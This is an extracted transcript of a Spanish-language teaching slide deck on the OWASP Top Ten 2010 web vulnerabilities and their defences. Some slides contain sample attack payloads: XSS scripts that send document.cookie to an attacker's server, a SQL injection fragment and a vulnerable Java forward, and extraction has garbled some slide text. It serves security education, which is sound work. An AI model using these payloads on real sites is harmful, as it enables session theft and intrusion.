Open Web Application Security Project (OWASP) Que es un ataque?

Transcripción

1 Open Web Application Security Project (OWASP) Roberto Gómez Lámina 1. Que es un ataque? Acción o acciones que tienen por objetivo el que cualquier parte de un sistema de información automatizado, deje de funcionar de acuerdo con su propósito definido. Esto incluye cualquier acción que causa la destrucción, modificación o retraso del servicio no autorizado. Lámina 2. OWASP 1

2 Aclaración ataque No es un ataque físico (aunque puede ser). Un ataque no se realiza en un solo paso. Depende de los objetivos del atacante. Puede consistir de varios pasos antes de llegar a su objetivo. Lámina 3. Mecanismos de seguridad Firewalls IDS (Sistemas de Detección de Intrusos) Filtrado de información Lámina 4. OWASP 2

3 Sin embargo Empresas necesitan dar servicios al exterior. Existe un puerto que siempre esta abierto Lámina 5. OWASP Open Web Application Security Project Grupo de voluntarios Produce documentación, herramientas y estándares gratuitos Calidad profesional y de código abierto Página Lámina 6. OWASP 3

4 Qué es Seguridad de Aplicaciones Web? No es seguridad en redes Asegurar el código regularmente usado en una aplicación web, Asegurar librerías. Asegurar sistemas de backend. Asegurar aplicaciones y servidores web. Seguridad en redes ignora el contenido del tráfico HTTP. Firewalls, SSL, Intrusion Detection Systems, Operating System Hardening, Database Hardening Lámina 7. Seguridad en red vs seguridad en web Network Lay yer Application Layer APPLICATION ATTACK Firewall Your security perimeter has huge holes at the application layer Custom Developed Application Code App Server Web Server Hardened dos Firewall Databas ses Legacy Sys stems Web Serv vices Director ries Human Re esrcs Billing You can t use network layer protection (firewall, SSL, IDS, hardening) to stop or detect application layer attacks Lámina 8. OWASP 4

5 OWASP Top Ten Las 10 vulnerabilidades principales que están usando los atacantes contra páginas Web Similar al Top 20 de SANS / FBI pero para aplicaciones Web Un buen estándar mínimo para exigir a las áreas de desarrollo La mayoría de los problemas anteriores caen en alguna de estas categorías generales Lámina 9. Las dos primeras versiones Unvalidated Input 1. Cross Site Scripting (XSS) 2. Broken Access Control 2. Injection Flaws 3. Broken Authentication and 3. Malicious File Execution Session Management 4. Insecure Direct Object 4. Cross Site Scripting Reference 5. Buffer Overflow 5. Cross Site Request Forgery (CSRF) 6. Injection Flaws 7. Improper Error Handling 8. Insecure Storage 9. Application Denial of Service 10. Insecure Configuration Management 6. Information Leakage and Improper Error Handling 7. Broken Authentication and Session Management 8. Insecure Cryptographic Storage 9. Insecure Communications 10. Failure to Restrict URL Access Lámina 10. OWASP 5

6 La versión 2010 A1: Injection A2: Cross-Site Scripting (XSS) A3: Broken Authentication and Session Management A4: Insecure Direct Object References A5: Cross-Site Request Forgery (CSRF) A6: Security Misconfiguration A7: Insecure Cryptographic Storage A8: Failure to Restrict URL Access A9: Insufficient Transport Layer Protection A10: Unvalidated Redirects and Forwards Lámina 11. Qué cambio? Se trata de riesgos, no solo vulnerabilidades Nuevo título: The Top 10 Most Critical Web Application Security Risks Metodología Basada en OWASP Risk Rating Methodology. Dos riesgos añadidos, dos eliminados Se añadio A6-Mala Configuración Seguridad Era A10 en el 2004: : Insecure Configuration Management Se añadio ñdi A10: Direccionamientos i i inválidos Relativamente comun y muy peligrosa falla que no es muy conocida. Se eliminó A3- Malicious File Execution Más que nada una falla en PHP que esta en decadencia Se eliminó A6 - Information Leakage and Improper Error Handling Una falla existente, pero que normalmente no representa mucho riesgo. Lámina 12. OWASP 6

7 Mapeo 2007 a 2010 OWASP Top (Previous) A2 Injection Flaws A1 Cross Site Scripting (XSS) A1 Injection OWASP Top (New) A2 Cross Site Scripting (XSS) A7 Broken Authentication and Session Management A4 Insecure Direct Object Reference A5 Cross Site Request Forgery (CSRF) <was T A10 Insecure Configuration Management> A8 Insecure Cryptographic Storage = = + A3 Broken Authentication and Session Management A4 Insecure Direct Object References A5 Cross Site Request Forgery (CSRF) A6 Security Misconfiguration (NEW) A7 Insecure Cryptographic Storage A10 Failure to Restrict URL Access A8 Failure to Restrict URL Access A9 Insecure Communications <not in T > A9 Insufficient Transport Layer Protection A10 Unvalidated Redirects and Forwards (NEW) A3 Malicious File Execution <dropped from T > A6 Information Leakage and Improper Error Handling <dropped from T > = Lámina 13. Metodología OWASP Top 10 Threat Agent? Attack Vector Weakness Prevalence Weakness Detectability Technical Impact Easy Widespreadd Easy Severe Average Common Average Moderate Difficult Uncommon Difficult Minor Business Impact? Injection Example 1.66 * weighted risk rating Lámina 14. OWASP 7

8 OWASP Top Ten (Edición 2010) Lámina Inyección Inyección implica Engañar a una aplicación incluyendo comandos en los datos enviados id a un interprete. Interpretes Toman los strings y los interpretan como comandos. SQL, Shell SO, LDAP, Xpath, Hibernate, etc. Inyección SQL aún es muy común. Muchas aplicaciones aún son susceptibles (no se sabe por qué). Aun cuando es usualmente simple de evitar. Impacto Usualmente severo. La base de datos entera puede ser leída o modificada. Posible contar con el esquema total de la base de datos, o contar con acceso a cuentas o a nivel S.O. Lámina 16. OWASP 8

9 s Desarrollo de Aplicaciones Distribuidas Ejemplo Inyección SQL ayer Application La HTTP request APPLICATION ATTACK Account Finance ts e ation ons Administra Transactio App Server ation Mgmt rce ions HTTP SQL response query Communica Knowledge M Custom Code Web Server E-Commer Bus. Functi Database tems Legacy Syst ces Web Servic es Directorie srcs Human Res DB Table Billing "SELECT * FROM Account Summary Account: accounts WHERE acct= Acct: SKU: OR = Acct: " Acct: Acct: Application presents a form to the attacker 2. Attacker sends an attack in the form data 3. Application forwards attack to the database in a SQL query Network Layer Firewall Hardened OS Firewall 4. Database runs query containing attack and sends encrypted results back to application 5. Application decrypts data as normal and sends results to the user Lámina Cross-Site Scripting (XSS) Ocurre en cualquier tiempo Datos en bruto es enviado por el atacante al browser de un usuario. Datos en bruto Almacenado en la base de datos Reflejado de la entrada web Enviado directamente a los scripts del cliente. Virtualmente cada aplicación web tiene este problema Intentar en el browser: javascript:alert(documento.cookie). Impacto típico Robar la sesión del usuario, robo de datos sensibles, rescribir la página web, redirigir usuario a un sitio de phishing o malware. Lámina 18. OWASP 9

10 Ataque XSS El problema reside en la administración de archivos adjuntos de tipo.html o.htm Manejar la salida de una aplicación web es lo mismo que pasar datos a los subsistemas el subsistema final al que se le pasa datos es el browser del visitante y el parser HTML en el browser solo es otro sistema cuando se envían datos a él se debe poner atención a los metacaracteres Problema notificado por CERT en el Lámina 19. Empecemos por lo sencillo Aplicación web: guest book permite visitantes introducir lo que dessen y solo añaden el nuevo texto a lo que estaba antes Usuario malicioso introduce lo siguiente: <!-- Nada pasa al principio, pero se mezcla con lo que se escribió y lo que se escribirá, aplicación web pasará lo siguiente a lectores libro de visitas: : Cool web page, dude! <!-- You re da man, boss : Lámina 20. OWASP 10

11 Otros dos ejemplos Posible introducir: <script> for (q=0; q < 1000; q++) window.open( </script> Otro ejemplo un sitio de discusión para niños el sitio carece de filtrado hacia afuera, y alguien introduce lo siguiente: <imag src = Lámina 21. Ejemplo XSS 1 2 Attacker sets the trap update my profile Attacker enters a malicious script into a web page that stores the data on the server Victim views page sees attacker profile Application with stored XSS vulnerability Accounts Finance Administration Transactions Communication Knowledge Mgmt E-Commerce Bus. Functions Custom Code Script runs inside victim s browser with full access to the DOM and cookies 3 Script silently sends attacker Victim s session cookie Lámina 22. OWASP 11

12 Algo de código JavaScript proporciona cookie al web server del atacante <script> document.location.replace( + =?what= + document.cookie) </script> Enviando el browser al sitio original <script> if (document.cookie.indexof( stolen ) < 0 { document.cookie = stolen=true ; document.location.replace( + =?what= + document.cookie + = &whatnext= ) } </script> Lámina 23. Otros ataques XSS Modificación texto posible cambiar información mientras la página es desplegada XSS con ingeniería social script malicioso no es almacenado en el servidor atacante engaña a la víctima, para que este se dirija a un URL con el scripto malicioso Robo de passwords algunos sitios vuelven a desplear el user-name si la autenticación falla, considerando que el password fue mal tecleado Lámina 24. OWASP 12

13 Ejemplo de ingeniería social Lámina 25. Esquemas a evitar en ambientes HTML #1: ( &, <, >, " ) &entity; ( ', / ) &#xhh; ESAPI: encodeforhtml() HTML Element Content (e.g., <div> some text to display </div> ) HTML Attribute Values (e.g., <input name='person' type='text' value='defaultvalue'> ) JavaScript Data (e.g., <script> some javascript </script> ) HTML Style Property Values (e.g.,.pdiv a:hover {color: red; text-decoration: underline} ) URI Attribute Values (e.g., <a href="javascript:toggle('lesson')" ) #2: All non-alphanumeric < 256 &#xhh ESAPI: encodeforhtmlattribute() #3: All non-alphanumeric < 256 \xhh ESAPI: encodeforjavascript() #4: All non-alphanumeric < 256 \HH ESAPI: encodeforcss() #5: All non-alphanumeric < 256 %HH ESAPI: encodeforurl() ALL other contexts CANNOT include Untrusted Data Recommendation: Only allow #1 and #2 and disallow all others See: for more details Lámina 26. OWASP 13

14 3. Autenticación rota y manejo de sesiones HTTP es un protocolo stateless Se deben presentar credenciales en cada petición Debe usar SSL para cualquier tipo de autenticación. Manejo de las fallas en la sesión SESSION ID usado para seguimiento del estado. SESSION ID es visible en la red, en browsers, logs, etc. Cuidado con los side-doors Cambiar contraseña, recordar contraseña, olvide mi contraseña, pregunta secreta, dirección correo, etc. Impacto Cuentas usuarios comprometidas o sesiones de usuarios secuestradas. Lámina 27. Ejemplo com?jsessionid=9fa1db9ea... 1 User sends credentials Site uses URL rewriting (i.e., put session in URL) 2 Accounts Finance Adm ministration Tr ransactions mmunication Knowledge Mgmt Commerce s. Functions Com K Custom Code E- Bus 3 User clicks on a link to hacker com in a forum 5 Hacker uses JSESSIONID and takes over victim s account Hacker checks referer logs on and finds user s JSESSIONID Lámina OWASP 14

15 4. Dirección insegura de referencias de objetos Cómo protege el acceso a sus datos? Es parte de reforzar Autorización, junto con el número 8: Restricción Acceso al URL Error común Solo listar los objetos autorizados para el usuario correcto o, Esconder los objetos referenciados en campos ocultaos.. Y entonces no aplicar estas restricciones en el lado del servidor. Esto se conoce como control de acceso a nivel presentación y no funciona. Atacante simple y sencillamente tampers con el valor del parámetro. Impacto Atacante puede acceder a datos o archivos no autorizados. Lámina 29. Ejemplo Attacker notices his acct parameter is 6065?acct=6065 He modifies it to a nearby number?acct=6066 Attacker views the victim s account information Lámina 30. OWASP 15

16 5. Cross Site Request Forgery (CSRF) CSRF Un ataque donde el browser de la víctima es engañado usando un comando hacia una aplicación web vulnerable. Vulnerabilidad provocada por que los browsers automáticamente incluyen datos de autenticación de los usuarios en cada petición. Imaginar Y si un usuario puede dirigir el ratón de un usurario y hacer click en ligas que se encuentran en una aplicación bancaria. Qué daño podrían provocar? Impacto Iniciar transacciones. Acceso a datos sensibles Cambiar datos cuentas. Lámina 31. Ejemplo 1 Attacker sets the trap on some website on the internet (or simply via an ) 2 Hidden <img> tag contains attack against vulnerable site While logged into vulnerable site, victim views attacker site Application with CSRF vulnerability Accounts Finance Administration Transactions Communication Knowledge Mgmt E-Commerce Bus. Functions Custom Code <img> tag loaded by browser sends GET request (including credentials) to vulnerable site Lámina Vulnerable site sees legitimate request from victim and performs the action requested OWASP 16

17 6. Mala configuración de seguridad Aplicaciones Web reposan sobre otro código. Todo desde el S.O. hasta el servidor Web No olvidar las librerías que se están usando. Es el código usado un secreto? Pensar en todos los lugares donde el código desarrollado se mueve. Seguridad no requiere código fuente secreto. CM se debe extender a todas las partes de la aplicación Todas las credenciales deben cambiar en producción. Impacto Instalar backdoor a través de parches no instalados del SO o servidor. Acceso no autorizado a cuentas por default. Lámina 33. Ejemplo ounts ance Acco Fina istration actions Admini Trans unication dge Mgmt mmerce unctions Commu Knowled E-Com Bus. Fu Database Custom Code App Configuration Insider Framework App Server Web Server Hardened OS Development QA Servers Test Servers Source Control Lámina 34. OWASP 17

18 7. Almacenamiento criptográfico inseguro Almacenando datos sensibles de forma insegura. Falla para identificar datos sensbibles. Falla para identificar todos los lugares donde estos datos son almacenados. Falla de proteger los datos en cada lugar. Impacto. Atacante accede o modifica información privada y/o confidencial. Atacante extrae secretos para usar en ataques posteriores. Mala reputación empresa, insatisfacción de los clientes, y la pérdida de confianza Gastos en la limpieza del incidente, tales como forencia, envío de cartas de disculpa, reponer tarjetas de crédito, proporcionar seguro contra robo de identidad. El negocio es demandado o terminado. Lámina 35. Ejemplo Victim enters credit 1 card number in form Accounts Finance Administration Transactions Communication Knowledge Mgmt E-Commerce Bus. Functions Custom Code 4 Malicious insider steals 4 million credit card numbers Log files Error handler logs CC details because merchant gateway is unavailable 2 Logs are accessible to all members of IT staff for debugging purposes 3 Lámina 36. OWASP 18

19 8. Falla en restringir el acceso al URL Cómo se protege el acceso al URL (páginas)? Esto es parte de reforzar la autenticación (punto 4). Error común Desplegar solo ligas autorizadas y opciones de menú. Esto se conoce como control de acceso a nivel presentación y no funciona. Atacante forza acceso directo a paginas no autorizadas. Impacto Atacante invoca funciones y servicios para los que no esta autorizado. Acceso a otras cuentas de usuarios y datos. Lleva a cabo acciones privilegiadas. Lámina 37. Ejemplo Attacker notices the URL indicates his role /user/getaccounts He modifies it to another directory (role) /admin/getaccounts, or /manager/getaccounts/ t Attacker views more accounts than just their own Lámina 38. OWASP 19

20 9. Insuficiente protección a nivel capa de transporte. Transmisión de datos de forma sensible. Falla en identificar los datos sensibles. Falla en identificar todos los lugares a los cuales los datos son enviados. Falla en proteger de forma apropiada estos datos en cada lugar. Impacto Atacante accede o modifica información privilegiada o privada. Tarjetas de crédito, registros hospitalarias, datos financieros (de la organización ió o de sus clientes) Atacante extrae secretos a usar en otros ataques. Mala reputación empresa, insatisfacción de los clientes, y la pérdida de confianza Gastos en la limpieza del incidente. El negocio es demandado o terminado Lámina 39. Ejemplo External Victim Custom Code Backend Systems Business Partners External attacker steals credentials and data off network External Attacker 1 2 Employees Internal attacker steals credentials and data from internal network Internal Attacker Lámina 40. OWASP 20

21 10. Redireccionamientos inválidos Redireccionamientos en una página web es algo común. Frecuentemente se incluyen parámetros proporcionados por el usuario en el URL destino. Si no son validados, el atacante puede enviar a la víctima al sitio de su preferencia. Forwards (aka Transfer en.net) también son comunes. Internamente envían la petición a una nueva página en la misma aplicación. Algunas veces los parámetros define la página. Si no son validados, el atacante puede ser capaz de usar forwards no validados para bypasear las verificaciones de autenticación y autorización. Impacto Redireccionar a la víctima a sitios de phishing o malware. Permite uso de funciones no autorizadas o acceso a datos. Lámina 41. Ejemplo Redirect 1 Attacker sends attack to victim via or webpage From: Internal Revenue Service Subject: Your Unclaimed dtax Refund Our records show you have an unclaimed federal tax refund. Please click here to initiate your claim. 3 Application redirects victim to attacker s site 2 Victim clicks link containing unvalidated parameter Accounts Finance Administration Transactions Communication Knowledge Mgmt E-Commerce Bus. Functions Custom stomcode Request sent to vulnerable site, including attacker s destination site as parameter. Redirect sends victim to attacker site Evil Site & &dest= Lámina Evil site installs malware on victim, or phish s for private information OWASP 21

22 Ejemplo Forward 1 Attacker sends attack to vulnerable page they have access to Request sent to vulnerable page which user does have access to. Redirect sends user directly to private page, bypassing access control. public void sensitivemethod( HttpServletRequest request, HttpServletResponse response) { try { // Do sensitive stuff here.... } catch (... 2 Application authorizes request, which continues Filter to vulnerable page 3 Forwarding gpage fails to validate parameter, sending attacker to unauthorized page, bypassing access control public void dopost( HttpServletRequest request, HttpServletResponse response) { try { String target = request.getparameter( "dest" ) );... request.getrequestdispatcher( target ).forward(request, response); } catch (... Lámina 43. Y que hacemos? Desarrollar código seguro Seguir las mejores prácticas de la guía del OWASP: Guide to Building Secure Web Applications Usar el estándar de verificación de seguridad en aplicaciones del OWASP, como una guía para saber que necesita una aplicación para ser segura. Usar componentes de seguridad que se acoplen a la organización. Utilizar OWASP s ESAPI como la base de los componentes estándares. /i h /ESAPI Revisar sus aplicaciones Que un equipo experto revise sus aplicaciones. Revise sus aplicaciones internamente siguiendo las guías OWASP OWASP Code Review Guide: OWASP Testing Guide: Lámina 44. OWASP 22

23 OWASP (ESAPI) Referencia: Lámina 45. Conclusiones No basta con una defensa perimetral Es importante saber que esta viendo la gente de afuera Nuestros desarrolladores todo es para ayer solo se preocupan porque funcione Un buen par de guías/referencias Writing Secure Code, Second Edition, Michael Howard, David LeBlanc Building Secure Software: How to Avoid Security Problems the Right Way -- by John Viega, Gary McGraw; OWASP Open Web Application Security Project Lámina 46. OWASP 23

24 Open Web Application Security Project (OWASP) Roberto Gómez Lámina 47. OWASP 24